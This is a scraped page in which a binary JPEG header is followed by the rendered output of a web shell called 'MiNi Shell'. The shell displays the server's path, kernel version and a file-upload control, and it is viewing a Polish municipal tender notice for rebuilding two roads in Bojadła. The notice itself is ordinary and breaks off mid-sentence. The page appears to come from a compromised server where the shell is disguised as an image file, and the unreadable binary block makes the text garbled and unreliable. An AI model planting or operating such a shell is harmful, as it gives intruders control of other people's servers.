JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221103/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20221103/0042082001-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa drogi gminnej nr 000509F i 000507F w miejscowości Bojadła </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA BOJADŁA</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 970770592</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Sulechowska 35</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Bojadła</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">66-130</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubuskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL432 - Zielonogórski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">68/3523332</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">urzad@bojadla.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bojadla.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - organ władzy publicznej - organ administracji rządowej (centralnej lub terenowej)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa drogi gminnej nr 000509F i 000507F w miejscowości Bojadła </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-59dc4a2c-5b4a-11ed-9171-f6b7c7d59353</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00420820</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-11-03</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00013227/07/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.5 Przebudowa drogi gminnej nr 000509F i 000507F w miejscowości Bojadła</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> 9. Zamówienie dofinansowane będzie z udziałem środków publicznych krajowych i unijnych w ramach Europejskiego Funduszu Rolnego na Rzecz Rozwoju Obszarów Wiejskich na lata 2014-2020. </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl/ oraz https://bip.bojadla.pl/11/ZAMOWIENIA_PUBLICZNE/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja między zamawiającym, a wykonawcami odbywa się przy użyciu środków komunikacji elektronicznej tj.:<br/> - miniPortal https://miniportal.uzp.gov.pl/,<br/> - ePUAP https://epuap.gov.pl/wps/portal, Skrytka ePUAP: /o7tq6q0c9r/skrytka<br/>- poczta elektroniczna: urzad@bojadla.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w regulaminie korzystania z systemu miniPortal: miniPortal (uzp.gov.pl) oraz w<br/>warunkach korzystania z elektronicznej platformy usług administracji publicznej (ePUAP). Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy:<br/>„Formularz złożenia, zmiany, wycofania oferty lub wniosku” i „Formularz do komunikacji” wynosi 150 MB.<br/>Załączniki do formularza komunikacji muszą być zgodne z obowiązującym KRI (Rozporządzenie Rady Ministrów z dnia 12 kwietnia 2012 r. w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych).Rekomendowany format danych .doc, .docx, .rtf, .pdf, .zip</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Na podstawie art. 13 ust. 1 i 2 Rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarza- niem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (Dz.U.UE.L. z 2016r. Nr 119, s.1 ze zm.) - dalej: „RODO”<br/>informuję, że:<br/>1. Administratorem Państwa danych jest Wójt Gminy Bojadła, ul. Sulechowska 35, 66-130 Bojadła, tel.: 68 3523332.<br/>2. Administrator wyznaczył Inspektora Ochrony Danych, z którym mogą się Państwo kontaktować we wszystkich sprawach<br/>dotyczących przetwarzania danych osobowych za pośrednictwem adresu email: inspektor@cbi24.pl lub pisemnie na adres<br/>Administratora.<br/>3. Państwa dane osobowe będą przetwarzane w celu związanym z niniejszym postępowaniem o udzielenie zamówienia publicznego<br/>jak również w celu realizacji praw oraz obowiązków wynikających z przepisów prawa (art. 6 ust. 1 lit. c RODO) oraz ustawy z dnia 11<br/>września 2019 r. Prawo zamówień publicznych (Dz. U. z 2019 poz. 2019 z późn. zm.),<br/>4. Państwa dane osobowe będą przetwarzane przez okres niezbędny do realizacji ww. celu z uwzględnieniem okresów<br/>przechowywania określonych w przepisach szczególnych, w tym przepisów archiwalnych.<br/>5. Państwa dane nie będą przetwarzane w sposób zautomatyzowany, w tym nie będą podlegać profilowaniu.<br/>6. Państwa dane osobowe nie będą przekazywane poza Europejski Obszar Gospodarczy (obejmujący Unię Europejską, Norwegię,<br/>Liechtenstein i Islandię).<br/>7. W związku z przetwarzaniem Państwa danych osobowych, przysługują Państwu następujące prawa:<br/>1) prawo dostępu do swoich danych oraz otrzymania ich kopii;<br/>2) prawo do sprostowania (poprawiania) swoich danych osobowych;<br/>3) prawo do ograniczenia przetwarzania danych osobowych;<br/>4) prawo wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych (ul. Stawki 2, 00-193 Warszawa), w sytuacji, gdy uzna<br/>Pani/Pan, że przetwarzanie danych osobowych narusza przepisy ogólnego rozporządzenia o ochronie danych osobowych (RODO);<br/>a) podanie przez Państwa danych osobowych jest obowiązkowe. Nieprzekazanie danych skutkować będzie brakiem realizacji celu, o<br/>którym mowa w punkcie 3.<br/>b) Państwa dane mogą zostać przekazane podmiotom zewnętrznym na podstawie umowy powierzenia przetwarzania danych<br/>osobowych, a także podmiotom lub organom uprawnionym na podstawie przepisów prawa.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">OR.271.13.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest zadanie polegające na wykonaniu dokumentacji projektowej oraz przebudowie drogi gminnej<br/>nr 000509F i drogi nr 000507F w miejscowości Bojadła, w systemie „zaprojektuj i wybuduj”, szczegółowo określone w:<br/>1) programie funkcjonalno- użytkowym (załącznik nr 4 SWZ) wraz z załącznikami,<br/>2) wzorze umowy (załącznik nr 3).<br/>Program funkcjonalno-użytkowy określa wszystkie wymagania dotyczące sporządzenia dokumentacji projektowej, a także<br/>wykonania robót budowlanych w zakresie przebudowy infrastruktury drogowej.<br/>W zakresie planowanego przedsięwzięcia jest wykonanie projektu budowlanego, uzyskanie pozwolenia na budowę lub,<br/>jeżeli nie ma takiej potrzeby, to zgłoszenia wykonania robót budowlanych, wykonanie projektów wykonawczych, specyfikacji<br/>technicznych wykonania i odbioru robót budowlanych, przedmiarów robót oraz innych dokumentów i opracowań<br/>niezbędnych do realizacji zamierzenia a następnie realizacja zamierzenia budowlanego zgodnie z opracowaną<br/>dokumentacją projektową. W ramach przedmiotu zamówienia należy uzyskać (także uaktualnić lub zweryfikować w<br/>zależności od potrzeb) wszelkie decyzje administracyjne i uzgodnienia niezbędne do zaprojektowania i wykonania<br/>przedmiotu zamówienia. Wszelkie opłaty i koszty z tym związane ponosi Wykonawca. Podane rozwiązania konstrukcyjne<br/>należy traktować jako minimalne propozycje, które nie ograniczają możliwości innych rozwiązań po uprzednim uzyskaniu<br/>akceptacji Zamawiającego.<br/>Dokumentacja projektowa powinna być kompletna z punktu widzenia celu jakiemu ma służyć, spełniać wymagania<br/>obowiązującego prawa, norm oraz przepisów techniczno-budowlanych. Wykonawca jest odpowiedzialny za zorganizowanie<br/>procesu wykonania opracowań projektowych.<br/>Dane wyjściowe i materiały niezbędne do wykonania zamówienia – podkłady geodezyjne, warunki techniczne, wypisy z<br/>rejestru gruntów, badania geotechniczne, uzgodnienia itp. – Wykonawca uzyska we własnym zakresie, chyba że w ich<br/>posiadaniu jest Zamawiający i ma możliwość ich udostępnienia. Koszty pozyskania map do celów projektowych, badań<br/>geotechnicznych, warunków technicznych przyłączy, uzgodnień oraz innych materiałów niezbędnych do realizacji<br/>przedmiotu zamówienia pokrywa Wykonawca.<br/>Wykonawca zobowiązany jest do uzyskania wszystkich niezbędnych opinii, uzgodnień i sprawdzeń rozwiązań projektowych<br/>w zakresie wynikającym z przepisów. Do dokumentacji technicznej należy dołączyć oświadczenie osoby posiadającej<br/>odpowiednie uprawnienia budowlane, iż projekt został opracowany zgodnie z umową, obowiązującymi przepisami oraz<br/>zasadami wiedzy technicznej. Dokumentację projektową należy przekazać w formie papierowej i elektronicznej.<br/>Zakres robót przewidzianych do realizacji został wskazany w załączniku nr 4 do SWZ - PFU i obejmuje między innymi<br/>wykonanie:<br/>Zakres planowanej przebudowy drogi gminnej obejmuje między innymi:<br/>a. rozebranie istniejących nawierzchni dróg,<br/>b. rozebranie istniejącego pobocza oraz terenów zielonych,<br/>c. wycięcie drzew i krzewów kolidujących z inwestycją,<br/>d. regulacja pionowa studni,<br/>e. humusowanie wraz z obsianiem trawą,<br/>f. ustawienie krawężników betonowych oraz obrzeży,<br/>g. wykonanie nowej nawierzchni drogi, chodników i poboczy,<br/>h. uporządkowanie terenu inwestycji,<br/>i. wykonanie oznakowania docelowego.<br/><br/>Zestawienie powierzchni przebudowywanego terenu: <br/>- powierzchnia drogi z kostki betonowej - 929,00 m2<br/>- powierzchnia drogi z asfaltu - 1 376,00m2<br/>- powierzchnia zjazdów - 84,50m2<br/>- powierzchnia chodników i poboczy z kostki betonowej - 360,50m2<br/>- powierzchnia poboczy z kruszywa - 642,50m2<br/>ŁĄCZNIE:	3 392,50m2<br/><br/>Projektowana konstrukcja drogi gminnej z kostki betonowej:<br/>• warstwa ścieralna z kostki betonowej bezfazowej - 8 cm,<br/>• podsypka cementowo-piaskowa 1:4 - 3 cm,<br/>• podbudowa zasadnicza – z kruszywa łamanego stabilizowanego mechanicznie o uziarnieniu ciągłym 0- 31,5mm - 20 cm,<br/>• grunt stabilizowany cementem o Rm=2,5MPa - 10 cm<br/>łączna grubość nawierzchni: 41 cm<br/><br/>Projektowana konstrukcja drogi gminnej z asfaltu:<br/>• warstwa ścieralna z betonu asfaltowego AC11S - 4 cm,<br/>• warstwa wiążąca z betonu asfaltowego AC16W - 6 cm,<br/>• podbudowa zasadnicza – z kruszywa łamanego stabilizowanego mechanicznie o uziarnieniu ciągłym 0-31,5mm - 20 cm,<br/>• grunt stabilizowany cementem o Rm=2,5MPa - 10 cm<br/>łączna grubość nawierzchni: 40 cm<br/><br/>Projektowana konstrukcja zjazdów z kostki betonowej:<br/>• warstwa ścieralna z kostki betonowej bezfazowej - 8 cm,<br/>• podsypka cementowo-piaskowa 1:4 - 3 cm,<br/>• podbudowa zasadnicza – z kruszywa łamanego stabilizowanego mechanicznie o uziarnieniu ciągłym 0-31,5mm - 20 cm,<br/>łączna grubość nawierzchni: 31 cm<br/><br/>Projektowana konstrukcja chodników i poboczy z kostki betonowej:<br/>• warstwa ścieralna z kostki betonowej bezfazowej - 8 cm,<br/>• podsypka cementowo-piaskowa 1:4 - 3 cm,<br/>• podbudowa zasadnicza – z kruszywa łamanego stabilizowanego mechanicznie o uziarnieniu ciągłym 0-31,5mm - 10 cm,<br/>łączna grubość nawierzchni: 21 cm<br/><br/>Wszystkie prace budowlane należy wykonywać pod nadzorem osoby uprawnionej, zgodnie z Programem Funkcjonalno Użytkowym (PFU) oraz zgodnie z normami i z obowiązującymi przepisami prawa. Elementy nieuwzględnione lub<br/>niedostatecznie opisane w Programie Funkcjonalno-Użytkowym, bezwzględnie skonsultować z inwestorem. Rozbieżności<br/>pomiędzy elementami dokumentacji projektowej, zawsze będą interpretowane na korzyść inwestora. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71320000-7 - Usługi inżynieryjne w zakresie projektowania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">140 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Maksymalna ilość punktów, jaką można uzyskać - 100,00 pkt.<br/>Punkty zostaną przyznane z dokładnością do dwóch miejsc po przecinku.<br/>Zamówienie zostanie udzielone wykonawcy, który spełni wszystkie wymagania postawione w SWZ oraz którego oferta otrzyma największą liczbę punktów w kryteriach oceny ofert.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Wydłużenie okresu gwarancji ponad wymagane 60 miesięcy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy nie podlegają wykluczeniu oraz spełniają warunki udziału<br/>w postępowaniu dotyczące:<br/>1.1. zdolności do występowania w obrocie gospodarczym,<br/>Opis spełnienia warunku:<br/>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełnienia warunków w tym zakresie i nie będzie dokonywał<br/>oceny jego spełniania.<br/>1.2. uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów,<br/>Opis spełnienia warunku:<br/>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełnienia warunków w tym zakresie i nie będzie dokonywał<br/>oceny jego spełniania.<br/>1.3. sytuacji ekonomicznej lub finansowej,<br/>Opis spełnienia warunku:<br/>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełnienia warunków w tym zakresie i nie będzie dokonywał<br/>oceny jego spełniania.<br/>1.4. zdolności technicznej lub zawodowej<br/><br/>a) wiedza i doświadczenie:<br/>Wykonawca musi wykazać, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia<br/>działalności jest krótszy, to w tym okresie wykonał z należytą starannością roboty budowlane tj:<br/>- co najmniej jedną robotę polegającą na budowie, rozbudowie lub przebudowie drogi o nawierzchni z kostki brukowej<br/>betonowej przy czym powierzchnia tej roboty musi być nie mniejsza niż 800 m2; jeżeli na potwierdzenie wiedzy i<br/>doświadczenia zostanie wskazana przebudowa lub rozbudowa drogi, w zakresie jej realizacji musi wystąpić wykonanie<br/>pełnej nawierzchni z kostki betonowej;<br/>- co najmniej jedną robotę polegającą na budowie, rozbudowie lub przebudowie drogi o nawierzchni utwardzonej masy<br/>asfaltowej przy czym powierzchnia tej roboty musi być nie mniejsza niż 1000 m2; jeżeli na potwierdzenie wiedzy i<br/>doświadczenia zostanie wskazana przebudowa lub rozbudowa drogi, w zakresie jej realizacji musi wystąpić wykonanie<br/>pełnej nawierzchni z utwardzonej masy asfaltowej.<br/>UWAGA:<br/>W przypadku Wykonawców wspólnie ubiegających się o zamówienie wykluczone jest łączenie ich potencjałów w zakresie<br/>doświadczenia w wykonaniu robót budowlanych. Zamawiający uzna warunek dot. zdolności technicznej i zawodowej<br/>określony w pkt a. za spełniony przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>jeśli co najmniej jeden Wykonawca wykonał z należytą starannością:<br/>- co najmniej jedną robotę polegające na budowie, rozbudowie lub przebudowie drogi o nawierzchni z kostki brukowej<br/>betonowej przy czym powierzchnia tej roboty musi być nie mniejsza niż 800 m2; jeżeli na potwierdzenie wiedzy i<br/>doświadczenia zostanie wskazana przebudowa lub rozbudowa drogi, w zakresie jej realizacji musi wystąpić wykonanie<br/>pełnej nawierzchni z kostki betonowej.<br/>- co najmniej jedną robotę polegające na budowie, rozbudowie lub przebudowie drogi o nawierzchni utwardzonej masy<br/>asfaltowej przy czym powierzchnia tej roboty musi być nie mniejsza niż 1000 m2; jeżeli na potwierdzenie wiedzy i<br/>doświadczenia zostanie wskazana przebudowa lub rozbudowa drogi, w zakresie jej realizacji musi wystąpić wykonanie<br/>pełnej nawierzchni z utwardzonej masy asfaltowej.<br/><br/>b) Osoby zdolne do wykonania zamówienia:<br/>Wykonawca musi mieć do dyspozycji odpowiednio wykwalifikowany personel, w tym:<br/>- kierownika budowy z uprawnieniami budowlanymi do kierowania robotami w specjalności drogowej, posiadającego minimum 5 letnie doświadczenie w kierowaniu budową drogową. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykaz podmiotowych środków dowodowych, składanych na wezwanie zamawiającego, w celu potwierdzenia spełnienia przez wykonawcę<br/>warunków udziału w postępowaniu:<br/>a) wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest<br/>krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania oraz podmiotów, na rzecz których roboty te<br/>zostały wykonane, oraz załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, przy czym<br/>dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane<br/>były wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne<br/>odpowiednie dokumenty,<br/>b) wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za<br/>świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji<br/>zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu<br/>wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Dokumenty, które należy złożyć wraz z ofertą (elektronicznie):<br/>1) Uproszczony kosztorys ofertowy;<br/>2) Oświadczenie, o 